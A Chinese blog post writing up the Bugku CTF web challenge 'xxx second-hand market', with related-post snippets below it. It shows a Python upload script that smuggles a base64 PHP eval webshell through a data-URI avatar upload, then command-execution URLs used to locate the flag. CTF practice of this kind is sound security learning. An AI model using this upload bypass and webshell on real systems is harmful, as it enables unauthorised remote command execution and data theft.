Bugku-xxx二手交易市场-ctf练习(不用菜刀蚁剑)

最新推荐文章于 2024-04-09 19:20:00 发布
最新推荐文章于 2024-04-09 19:20:00 发布
阅读量878 收藏 2
点赞数 1
分类专栏: ctf web python 文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lshandel/article/details/118864015
版权
ctf 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
web
3 篇文章 0 订阅
订阅专栏
python
3 篇文章 0 订阅
订阅专栏

题目

xxx二手交易市场
描  述: 本人现实碰到的题目,无提示勿问
(这次题目比较牛逼,感觉实战性非常强。。。也挺有难度的)
在这里插入图片描述

首先分析一波

突然给我们这么一个网站,那就随便先点点看吧,看到id=的时候dna就动了感觉可能要注入,试了试发现不太行,决定先换个思路,再吸引到我的是注册
在这里插入图片描述

注册并且登录之后可以打开个人中心在这里插入图片描述
思路来了,可能能通过图片一句话木马获得shell

然后破解一波

先随便上传一张图片抓个包在这里插入图片描述
这就找到了提交表单的url:http://114.67.246.176:17576/user/upload
接着看到这一行在这里插入图片描述
上传image文件的content-type可以是image/*

接着放一波技能

我们就上传一个image/php方便我们获得shell

import requests
url='http://114.67.246.176:17576//user//upload'
head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0',
    'Cookie': 'PHPSESSID=8e5042eb614c4fdb694a293e3355764e; Hm_lvt_c1b044f909411ac4213045f0478e96fc=1626231295; _ga=GA1.1.72381211.1626231295',
    'Referer': 'http://114.67.246.176:17576/user'
}
mydata={'image':'data:image/php;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUWydjbWQnXSk7ID8+'}
html=requests.post(url,headers=head,data=mydata).text
with open('练习.html','w') as f:
    f.write(html)

这里获得一个html文件是为了获得返回的页面,也就是看是否文件上传成功
post的内容是根据抓包得到的数据制定的,data:image/php;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUWydjbWQnXSk7ID8+ 后面这一部分是base64编码
解码后其实是帮我们获得shell的一句话木马:<?php @eval($_REQUEST['cmd']); ?>

上传成功就会得到这样的页面在这里插入图片描述
下面审查元素得到我们php文件的路径在这里插入图片描述

构造链接查看当前路径
http://114.67.246.176:17576//Uploads//heads//ac503144f38620a5.php?cmd=system(%27pwd%27);
得到:在这里插入图片描述
逐级跳转查看找flag
http://114.67.246.176:17576//Uploads//heads//ac503144f38620a5.php?cmd=system(%27cd …/;ls%27);

第三个根目录的时候找到了flag
http://114.67.246.176:17576//Uploads//heads//ac503144f38620a5.php?cmd=system(%27cd%20…/…/…/;cat%20flag%27);

在这里插入图片描述
或者直接
http://114.67.246.176:17576//Uploads//heads//ac503144f38620a5.php?cmd=system(%27find%20/%20-name%20flag%27);
学不会了太难了

青 霞
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
XXX交易系统部署手册
03-01
XXX交易系统部署手册
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于HTTP的挑战从端口8000开始,tcp挑战从端口9000开始 如果您不熟悉Docker,则在本文档底部介绍两个用于安装docker的选项。 挑战性 现场挑战标有* 挑战名称 类别 点数 easyauth 网页 30 大号1 网页 20 尊宝2 网页 100 zumboa 3 网页 250 德尔福状态 加密/网络 250 2000年 网页 100 简单的 倒车 10 船长 倒车 75 船长2 倒车 200 撤防 倒车 400 标记接收器 移动/倒车
bugku-web-xxx二手交易市场
最新发布
qq_75121443的博客
04-09 937
因为这里发布的填写数据,是可以被我们直接访问到的,如果我们在这些信息中包含一句话木马,是否可以利用菜刀连接呢。这里可以看到,如果头像的一句话木马上传成功,则可以直接访问连接,成功getshell。在当前网站目录下可以看到大量的文件,有一个文件的名称名为flag,打开查看。这里我们抓取上传报文,将这里的image数据给改了,改为一句话木马。好家伙,居然对注释字符进行了过滤,无法闭合,sql注入点不存在。这里看到data这个关键字,即下面的是上面报文加密的状态。发现求购页面是假的,只有二手页面可以点开。
[watevrCTF-2019]Cookie Store
07-26 301
打开之后是一个饼干购买商城的页面,发现我有50块钱,但是想要购买flag需要100块,买不起,给自己加点钱吧,使用editthiscookie可以修改cookie。 修改money的数量, 然后base64 编码修改一下cookie的值。 刷新后发现自己的钱变多了,直接买flag就可以了。 ...
2024年江苏省职业院校技能大赛信息安全管理与评估 第三阶段学生组(样卷)
Geek极安云科-致力于网络安全事业
12-05 442
任务六 | 请获取FTP服务器上task6目录下的文件进行分析,找出其中隐藏的flag,并将flag提交。flag格式flag{} | | | | 任务七 | 请获取FTP服务器上task7目录下的文件进行分析,找出其中隐藏的flag,并将flag提交。flag格式flag{} | | | | 任务八 | 请获取FTP服务器上task8目录下的文件进行分析,找出其中隐藏的fla
bugku~xxx二手交易市场
o3Ev的博客
03-23 1389
bugku~xxx二手交易市场 打开环境: 页面内的东西很多,这时我们随便点点, 可以看到在url地址栏上出现了id=xxx的字样,我一瞬间想到了sql注入,然后构造了一些payload,发现不行,就继续去找其他的页面了, 我们不难想到这些页面容易发生漏洞的地方-------登陆或者注册页面 这时我们随便先试试注册一个账号,再登陆进去,可以发现来到了用户界面 用户界面一般就可以进行上传头像等,果不其然(真的可以上传头像 既然都可以上传头像了,应该就是文件上传漏洞了,随便上传个图片抓包试试: 可以发现
Bugku CTF 每日一题 xxx二手交易市场
彼岸花苏陌的博客
01-17 3354
xxx二手交易市场 打开看见是一个网站 所以从零开始测试 1.首先点开一个商品 往下滑有回复框 但是要先注册 所以等注册了再来测试 2.搜索栏也不能用 暂时放过,不过在二手界面发现了一个搜索框 输入一般的sql查询发现好像过滤了# ‘’“”等 3.求购 公告栏也没什么可以利用的 4.发现登录注册框 先爆破一下,不过有验证码爆破不行还要识别验证码,先放放 5.先注册一个账号 看了一下功能,先上个商品看看? 额 要管理员验证 走不通 邮箱签名那块也是有输入验证 再去看看回复框 好像没什么用 再翻了翻 还有上
Bugku WEB xxx二手交易市场
qq_41696858的博客
07-08 331
1.打开场景,发现是一个二手交易市场,常用思路是商品信息啥的,后台登录啥的,sql注入啥的,反正一通尝试,发现在注册后更换头像时存在上传漏洞,,抓包改包那么就可以拿到shell,注意这里需要把一句话木马base64编码,data:image/jpeg,可以指定文件后缀,将jpeg改为php后后台就会将其解析为php文件 一句话<?php eval($_REQUEST[8]) ?> 这里要注意,提升上去的system()后面要加;收尾,否则会报错,不知道为啥,大佬可以给个评论 2.据说菜刀啥的
Bugku CTFxxx二手交易市场
花城的博客
01-16 2779
Bugku CTFxxx二手交易市场0x001 wp0x002 结束语 0x001 wp 打开题目,点击进入链接,是一个二手交易市场平台 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MtO8UwwV-1642260210908)(https://huacheng1122.cn/posts/973fb9c2/s1.png#pic_center)] 开始想的可不可能是修改购买价格,然后发现根本没有购买功能,只能先登录看看 根据我学过的一丢丢漏洞知识,感觉昵称可能有注入,下
Bugku-Web-xxx二手交易市场
豆傻小饼干随记
01-18 1685
题目描述 解题思路 先注册一个用户,在用户头像出发现可以上传头像 于是上传一个图片进行抓包,发现它上传的样式是先把图片变成base64格式的 图片转成base64编码的格式如下: data:image/jpeg;base64, 所以这里仿造一下,将文件后缀改为php,再把php使用base64进行编码 在上传后可以看到相应报文中有具体的绝对路径,直接使用连接 即可得到flag ...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-Game-Challenges:精选各种CTF的游戏挑战赛清单
05-09
CTF游戏挑战我最近一直在学习有关游戏黑客的知识,而我可以合法找到的最好的练习方法是玩 。 但是困难的部分是从以前的CTF中找出游戏中的挑战。 此列表包括我在玩ctfs和阅读文章时遇到的游戏挑战。 由于一些游戏...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
CTF-Heaven:TF CTF天堂
05-06
欢迎来到CTF的世界 :skull_and_crossbones:‍:skull_and_crossbones: | 2021年3月12日| 鸣谢:( 和( 。 这是每个类别的一些基础知识的简介。 它旨在帮助初学者和老同志,享受骑行和“ HackThePlanet”。 这些...
[watevrCTF-2019]Pickle Store
qq_61209261的博客
08-13 363
pickle反序列化
BUUCTF刷题记录 老八小超市儿
m0_46576074的博客
05-28 445
[GKCTF2020]老八小超市儿 进入网址 admin.php进入后台 账号admin 密码shopxo 应用中心——应用商城——主题 下载默认主题 编写一个a.php文件放进默认主题 a.php文件内容 <?php @eval($_POST[a]); phpinfo(); ?> 测试成功性 http://771c3e8f-4cea-4775-be69-fce5b8bd52f2.node3.buuoj.cn/public/static/index/default/a.ph
bugku xxx二手交易市场
qq_33522311的博客
06-13 127
一、打开靶场,注册一个账号 二、
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值